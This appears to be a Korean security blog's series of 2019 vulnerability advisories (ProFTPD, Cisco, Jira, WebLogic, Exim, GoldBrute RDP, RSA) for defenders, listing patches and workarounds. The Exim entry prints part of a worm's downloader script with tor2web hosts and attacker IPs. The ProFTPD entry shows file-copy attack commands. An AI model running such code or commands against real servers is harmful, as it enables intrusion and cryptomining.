요약

- 취약점 : mod_copy 모듈에 취약점이 존재. 인가받은 사용자가(anonymous user 포함) 쓰기 권한 없이도 

             임의의 파일을 복사해(CPFR) FTP 서버에 새로운 파일을 생성(CPTO)을 할 수 있음.

             (공격 실패 시에는 서비스 거부 상태를 초래)

- 취약원인 : SITE CPFR과 SITE CPTO 명령어의 버그로 인해 “Limit WRITE” denyall을 무시하게 되어 발생

- 선행조건 : 

(1) 공격자는 ProFTPD 서버에 사용자 또는 anonymous user로 접속 필요.

(2) mod_copy 모듈이 enabled 되어 있어야 함   (*초기 설정은 대부분 enabled 임)

(3) 웹 서버에서 FTP 디렉토리 접근이 가능해야 함

- 공격예시 :

> ftp접속

> user 도는 anonymous로 로그인 (anonymous로 로그인 시 DenyAll조건으로 인해 파일 업로드가 불가능해야 함.)

> site cpfr welcome.msg

> site cpto malicious.php

welcome.msg의 내용을 malicious.php에 복사해 새 파일을 생성 가능.

- 영향 받는 제품 :  ProFTPD 1.3.6 버전을 포함한 모든 버전

  (단, 1.3.6 버전의 경우 2019.7.17일 이전에 컴파일된 소스나, 바이너리로 설치가 된 경우 취약함)

- 공식 대응법 : 취약점에 대한 패치 실시 (공식 패치는 2019.7.17일 발표되었으며, 백포팅 실시 됨, 취약점을 개선한 최신 버전은 아직 발표되지 않음)

- 임시 대응법 : mod_copy 모듈을 disable로 설정

- 영향성 : 공격 성공을 위한 선행 조건이 다수 존재해, 위험성이 낮아 보이나, 해당 취약점이 악용될 소지가 많음. 

             공격자가 접근 가능한 ProFTPD 서버에 파일을 지속적으로 복제하며 이를 저장소로 악용 가능하며, 

             원격 코드 실행 공격 등에도 악용될 수 있음. 


관련 CVE정보

-  CVE-2019-12815

-  CVSS 3.0 Base Score: 9.8

-  PoC : 현재 없음(2019.07.24 16:05)

-  CVE-2015-3306과 연관성 있음 

   *CVE-2015-3306: 원격공격자가 SITE CPFR, SITE CPTO 명령어를 이용해 임의의 파일을 읽고 쓸 수 있음.


참고자료

출처 : https://www.bleepingcomputer.com/news/security/proftpd-vulnerability-lets-users-copy-files-without-permission/

         https://thehackernews.com/2019/07/linux-ftp-server-security.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Cyber+Security+Blog%29

         http://bugs.proftpd.org/show_bug.cgi?id=4372

요약

- 취약점 : 

         Cisco Vision Dynamic Signage Director의 REST API 인터페이스의 취약점으로 인해 비인가 원격 공격자가 취약 시스템의 인증을 우회할 수 있음.

         공격자는 특수하게 가공된 HTTP 요청을 취약 시스템에 전송하여, 공격 성공 시 REST API를 통해 관리자 권한으로 임의의 행위(action)을 할 수 있음.

        * REST API 의 기본적으로 사용가능(enabled)로 설정 되어 있으며, 사용불가능으로 설정 변경이 불가능함.


- 취약원인 : HTTP 요청에 대한 미흡한 검증

- 영향 받는 제품 : 

Cisco Vision Dynamic Signage Director 6.1

Cisco Vision Dynamic Signage Director 6.0

Cisco Vision Dynamic Signage Director 5.0

Cisco Vision Dynamic Signage Director 5.0 이하 버전


- 공식 대응법 : 취약한 버전에 대한 패치 

Cisco Vision Dynamic Signage Director 6.1   → 6.1 sp3

Cisco Vision Dynamic Signage Director 6.0   → 6.1 sp3로 마이그레이션

Cisco Vision Dynamic Signage Director 5.0   → 5.0 sp9

Cisco Vision Dynamic Signage Director 5.0 이하 버전 → 5.0.sp9로 마이그레이션

- 임시 대응법 : 현재 없음


관련 CVE정보

- CVE-2019-1917

- CVSS 3.0 Base Score: 9.1

- PoC : 현재 없음 (2019.07.18 14:30)


참고자료

출처 : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-cvdsd-wmauth

요약

- 취약점 : ContactAdministratos, SendBulkMail 액션에 서버 사이드 템플릿 삽입 취약점 존재. 공격자는 취약한 jira 시스템에 원격으로 코드를 실행 할 수 있음

- 선행조건 : 

(1) SMTP 서버가 Contact Administrators Form 설정이 Enable → 인증 없이 공격 가능

(2) 공격자가 Jira Administrator 접근 가능 → 인가된 사용자로 공격 가능

- 영향 받는 제품 : 

Jira Server, Data Center version  4.4.0 - 7.6.14, 

Jira Server, Data Center version  7.7.0-7.13.5

Jira Server, Data Center version  8.0.0-8.0.3

Jira Server, Data Center version  8.1.0 - 8.1.2

(Jira Software, Jira Core, Jira Service Desk 또한 영향 받음/ Jira Cloud 경우 안전)

제품 리스트 참고 : https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html


- 공식 대응법 : 취약한 버전에 대한 패치 필요 (7.6.14, 7.13.5, 8.0.3, 8.1.2, 8.2.)

- 임시 대응법 : 

      (1) Contact Administrator Form 설정 – Disable

          설정 > 시스템 > 일반 설정 > 설정 변경 > Contact Administrator From 설정 Off > 하단 업데이트 버전 클릭으로 설정 적용

      (2) 엔드포인트의 /secure/admin/SendBulkMail!default.jspa 접근 제한 : reverse-proxy, load balancer, Tomcat에서 접근 제한 설정

       * SendBulkMail 자체 접근을 제한할 시 Jira admin이 사용자들에게 벌크 이메일 전송이 불가능하게 됨.

       Jira 업그레이드 후, Adminstrator Contact Form 재 설정 및 SendBulkMail의 접근 제한을 해제 할 수 있음


관련 CVE정보

- CVE-2019-11581

- CVSS 3.0 Base Score: 8.1

- PoC : 현재 없음 (2019.07.12 10:30)

(현재 공식 PoC는 존재 하지 않으나 과거 Atlassian 발견 취약점(CVE-2019-3395,CVE-2019-3396)에 대한 PoC가 취약점 발표 후 오래지 않아 발표된 것처럼 jira 취약점 PoC도 곧 나타날 것으로 예상)


영향성

CVE-2019-2725에 대한 패치가 적용 되었더라고 공격이 가능함으로, 신속한 임시 대응 조치가 필요함.


참고자료

출처 : https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

https://www.tenable.com/blog/cve-2019-11581-critical-template-injection-vulnerability-in-atlassian-jira-server-and-data?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+tenable%2FqaXL+%28Tenable+Network+Security+Blog%29

요약

 Cybersecurity and Infrastructure Security Agency(CISA) 에서 CVE-2019-0708 Windows 2000 버전 공격이 가능한 Exploit을 만듦.


<현재까지 알려지 취약 OS 버전>

32/64 bit 무관, Service Pack 버전 무관하게 아래의 OS  버전이 취약함 .

  • Windows 2000  *추가 됨 
  • Windows Vista  *추가 됨
  • Windows XP
  • Windows 7
  • Windows Server 2003
  • Windows Server 2003 R2
  • Windows Server 2008
  • Windows Server 2008 R2


- Windows 2000의 경우 패치가 없으므로, 업그레이드 권고


참고자료

https://www.us-cert.gov/ncas/alerts/AA19-168A

요약

- 취약점 : Alibaba Cloud 보안팀이 CVE-2019-2725 패치의 취약점 발견. 

             공격자는 CVE-2019-2725 패치를 우회해 임의의 코드 실행이 가능함. 현재 해당 공격이 활발히 이루어지고 있음.

- 취약원인 : Weblogic을 서포트 하는 JDK 버전에 취약점 존재.

- 영향 받는 제품 : 

Oracle WebLogic Server 10.3.6.0.0, 

Oracle WebLogic Server 12.1.3.0.0

- 공식 대응법 : 6/12일 Oracle은 취약점에 대해 공식적으로 확인하였으나 대응법을 발표 하지 않음

- 임시 대응법 :

방법1) wls9_async_response.war, wls-wsat.war 파일을 찾아 삭제 후 Weblogic 서비스를 재 시작.

   (wls9_async_response.war, wls-wsat.war 파일을 직접적으로 사용하지 않는 경우 추천)


<파일경로>

 10.3.X 버전:

 \Middleware\wlserver_10.3\server\lib\

 %DOMAIN_HOME%\servers\AdminServer\tmp\_WL_internal\

 %DOMAIN_HOME%\servers\AdminServer\tmp\.internal\


12.1.3 버전 :

\Middleware\Oracle_Home\oracle_common\modules\

 %DOMAIN_HOME%\servers\AdminServer\tmp\.internal\

 %DOMAIN_HOME%\servers\AdminServer\tmp\_WL_internal\


방법2) /_async/* 와 /wls-wsat/* 경로의 URL 접근을 제한.

 -> 비지니스 시스템 작동에 문제를 일으킬 수 있으므로, whitelist 기반 특정 사용자만 접근이 가능하도록 정책 변경.


방법3) Weblogic 지원 Java 버전 업그레이드


관련 CVE정보

-  CNNVD-201906-596 (중국 NISVL 지정)

-  PoC : 현재(2019.06.18 16:00) 없음.


영향성

CVE-2019-2725에 대한 패치가 적용 되었더라고 공격이 가능함으로, 신속한 임시 대응 조치가 필요함.


참고자료

출처 : https://medium.com/@knownsec404team/knownsec-404-team-alert-again-cve-2019-2725-patch-bypassed-32a6a7b7ca15

https://read01.com/oAONReQ.html#.XQiB-1Uzb28

https://4hou.win/wordpress/?cat=20

https://www.anquanke.com/post/id/180390

요약

- 6/3일 발표된 CVE-2019-10149 취약점을 이용해 WannaMine 공격에 사용되었던 가상화폐 채굴기를 설치하는 활발한 공격이 포착 됨.

- 공격 패턴 :

(1) 공격자 취약서버에 스크립트를 업로드 하고, ssh를 통해 영구적인 root 권한을 획득하고 있음.

(2) Openssh가 취약 서버에 설치 되어 있는지 확인하고, 설치 되어 있지 않을 시, openssh 및 기타 툴을 설치하는 스크립트는 

        tor2web 라우팅 서비스를 이용해 다운 받음.

(3) 스크립트는 기존/새로 설치된 openssh 설정을 WITH AN RSA PUBLIC/PRIVATE KEY AUTHENTICATION >> 과 ssh를 통해 root 로그인을 

        permit하도록 변경  → 서버 공격에 성공 시, 공격자는 private/public 키 인증을 통해 서버에 대한 root 권한 접근이 가능함.

(4) 취약점 공격 성공 후, 포트 스캐너를 실행해 추가 감염 시스템을 검색 함 (python으로 쓰여 짐)

(5) 최종 공격 단계에서 윈도우 아이콘 파일을 다운로드 함 : 실제는 zip 압축 파일로 “no-password”암호가 걸려 있음. 

        압축 해제 시 가상화폐 채굴기 존재.

- 이미 설치된 가상 화폐 채굴기 및 보안 시스템을 제거 후 공격자의 가상화폐 채굴기를 설치

- 윈도우 아이콘 : Github 공식 아이콘과 유사


- 탐지 방법 

(1) 공격자 사용 TOR 히든 서비스 : an7kmd2wp4xo7hpr

(2) 공격자 사용 private 키 : 

AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"

(3) kthrotlds 프로세서가 서버에서 실행 중 인지 확인

→ 프로세서는 다양한 경로에 악성 코드 설치 및 이전 cron 테스크를 지우기 때문에 백업으로 복구 필요


(악성 코드)

#!/bin/sh

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

RHOST=”https://an7kmd2wp4xo7hpr”

TOR1=”.tor2web.su/”

TOR2=”.tor2web.io/”

TOR3=”.onion.sh/”

RPATH1=’src/ldm’

#LPATH=”${HOME-/tmp}/.cache/”

TIMEOUT=”75″

CTIMEOUT=”22″

COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”

WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”

tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)

curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi

wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi

#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘

CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; ‘

LBIN8=”kthrotlds”

null=’ >/dev/null 2>&1′


(4) Crontab 에서 새롭게 추가된 cronjob이 있는지 확인 후 제거 : 공격 단계별로 다 수의 페이로드를 cronjob을 통해 다운받기 때문에 

        반드시 확인 필요

(5) F/W과 Access 로그에서 아래 호스트에 대한 접근 확인

https://an7kmd2wp4xo7hpr.tor2web.su

https://an7kmd2wp4xo7hpr.tor2web.io

https://an7kmd2wp4xo7hpr.onion.sh

(6) 공격자는 [http://173.212.214.137/s] 에서 스크립트를 다운받으라고 시도 함.


[Exim 원격 명령어(Command) 실행 취약점(CVE-2019-10149)]

- 취약점 : 6/3일 Qualys 회사가 메일 전송 에이전트(mail transfer agent, MTA)로 알려진 Exim에 원격 코드 실행 취약점이 존재하는 것을 발견.

- 로컬 공격 : 로컬 공격자는 root 권한으로 임의의 명령어를  execv( )를 이용해 실행 할 수 있음 

                      (메모 변질 또는ROP (Return-Oriented Programming)와 연관성 없음)

공격자는 deliver_message( )함수 내 expand_string 함수가 해석할 특수하게 가공된 로컬 호스트의 메일 주소로 메일을 보내 

root권한으로 명령어를 즉시 실행 할 수 있음. 

*ROP(Return-Oriented Programming) : 취약한 프로그램 내부에 있는 기계어 코드 Gadget을 이용하여 BOF 공격 시 특정 명령을 실행시키는 방법으로 메모리 보호기법을 우회할 수 있는 공격 방법.


- 원격 공격 : 

(1) 초기 설정 값 유지  : 원격 공격도 기능하나 공격자가 취약한 서버에 7일 이상 접속을 유지하고 있어야 하므로,  

                                  현실적으로 불가능할 것으로 추정.

(2) 초기 설정 값 유지 X : 아래의 경우, 로컬 공격 방법으로 원격 공격이 가능함

초기 설정 파일(src/configure.default)에서 ‘verify = recipient’ ACL 이 제거 된 경우

userforward 라우터 아래의 'local_part_suffix = + * : - *'주석을 제거한 경우

Exim이 보조 MX (Mail eXchange)로  원격 도메인 주소에 메일을 전달하게 설정 된 경우


- 영향받는 제품 : Exim 버전 4.87  ~ 4.91 을 사용하는 오픈소스 운영체제 (ex. Debian, Red Hat, Ubuntu 등)

- 대응방안 : 4.92 버전으로 업그레이드 또는 각 버전별 패치 적용.

- 영향성 : Shodan 검색 결과 410만대의 시스템에 취약함 (Exim 사용 시스템 중 약 90%의 시스템이 취약)


관련 CVE정보

- CVE-2019-10149

- CVSS 3.0 Base Score: 9.8

- PoC : 현재(2019.06.14 10:00) 없음 *자세한 취약 요소에 대해서는 최초 분석글에서 확인 가능

    (https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt)


탐지룰 존재유무

- TippingPoint : 35520: SMTP: Exim Internet Mailer Command Injection Vulnerability


참고자료

탐지방법/대응법 : https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

      https://www.srv24x7.com/kthrotlds-cve-2019-10149-exim/

출처 : https://www.tenable.com/blog/cve-2019-10149-critical-remote-command-execution-vulnerability-discovered-in-exim

        https://www.openwall.com/lists/oss-security/2019/06/05/4

        https://www.exim.org/static/doc/security/CVE-2019-10149.txt

        https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

요약

- GoldBrute 별칭의 취약하거나 재사용 하는 패스워드를 이용한 RDP 서버 무차별 대입 공격 성행 중.

- 공격 내용 : 단일 C&C[104.156.249.231]를 이용해 인터넷에 노출된 150만의 RDP 서버에 대해 무차별 대입 공격 중.

  (전체 노출 RDP 서버 중 약 62.5%에 달하는 서버를 공격 중. Shondan 검색 결과, 현재 인터넷에 노출된 RDP 서버의 수는 240만대)

- 공격 코드를 이용한 시뮬레이션 결과, 6시간 동안 1,596,571 유니크한 IP를 포함한 210만개의 IP가 C2 서버로 전송 되는 것을 확인

   (해당 IP들에 대한 무차별 대입 공격은 실시하지 않음)

   [시뮬레이션 결과: 취약 IP 지역별 분포]  출처 참고


관련 CVE정보

 - CVE Code : 현재 (2019.06.10 10:00) 없음
 - PoC : https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d
   ■ Console.java : GoldBrute의 C2 정보와 파라미터가 지정된 것을 확일 할 수 있음.
   ■ Config.java  : AES 암호화 C2 트래픽 파라미터와 목표 스캔 IP 대역을 확인 할 수 있음. 
시작 대역 : 210.200.0.0 :3389
종료 대역 : 210.211.255.0 :3389
   ■ 대부분의 초기 파라미터는 C2에 의해 변경 되었을 것을 추정.
C&C IP : 104.156.249.231
- ZIP 파일 다운로드 IP : 104.248.167.144
- 사용 포트 : Bot 들은 데이터를 AES 암호화된 WebSocket을 8333 포트를 이용해 전송
- 감염 양상 :
      (1) RDP 스캔 공격
- 감염된 시스템은 bot 코드를 다운받도록 지시 받음. 
           → Bot 코드는 80MB 크기이며, Java Runtime 완성 본을 포함하고 있음
- bot은 "GoldBrute"라는 Java 클래스에 구현 되고. RDP 서버를 노출시키고 있는 호스트를 찾기 위해 임의의 IP들을 스캔
- bot이 80개의 RDP 서버 노출 IP를 찾으면, C&C 서버는 bot 에게 다수의 노출 RDP 서버에 무차별 대입 공격을 실시하게 함.
→ 이는 보안장비의 탐지를 피하기 위해 Bot은 특정 사용자 계정과 패스워드를 이용해 오직 한 번의 공격만 실시 함
(2) RDP 계정 무차별 대입 성공 후
- GoldBrute Java 코드와 Java runtime을 포함하고 있는 zip 압축 파일을 다운 받음
- zip 파일 압축 해제 후, jar파일 'bitcoin.dll'을 실행.
→ dll 확장자는 의심을 피하기 위해 위장한 것으로 볼 수 있음. 
- 새로운 bot 이 인터넷 노출 RDP 서버를 스캔 공격을 하면 위의 공격 패턴 반복
(3) 최종적으로 무차별 대입에 성공한 host 정보, 사용자 계정, 패스워드 정보를 C&C에서 갖게 됨


영향성
① 해당 취약점 관련 무차별대입공격이 예상 되므로 C&C IP에 대한 긴급차단 실시
② RDP서비스 외부 오픈에 대한 정책검토필요
 - RDP 서비스 기본포트 사용금지 (포트 변경사용 권장)
 - RDP 서비스 사용 필요 시 WhiteList 기반의 사용 권장

참고자료
출처 : https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d
   https://www.shodan.io/search?query=Remote+desktop
   https://threatpost.com/forget-bluekeep-beware-goldbrute/145482/


요약

- 취약점 : 사용자의 인증값에 대한 검증이 미흡해 취약점 존재. 

             비인가 원격 공격자가 특수하게 가공한 인수를 전송해 서버에 임의의 코드를 실행 할 수 있음

- 영향 받는 제품 : 

RSA Security Analytics 버전 10 : 10.6.6.0 이하 제품

RSA NetWitness Platform 버전 11 : 11.2.1.0 이하 제품 

- 대응방안 : 

RSA Security Analytics 버전 10 : 10.6.6.1 로 패치 

RSA NetWitness Platform 버전 11 : 11.2.1.1 로 패치 


관련 CVE정보

- CVE-2019-3725

- CVSS Base Score: 9.8

- PoC : 현재 없음


영향성

해당 버전 사용 그룹사는 신속한 패치 필요 


참고자료

출처 : https://community.rsa.com/docs/DOC-104202

        https://www.securityfocus.com/bid/108355

+ Recent posts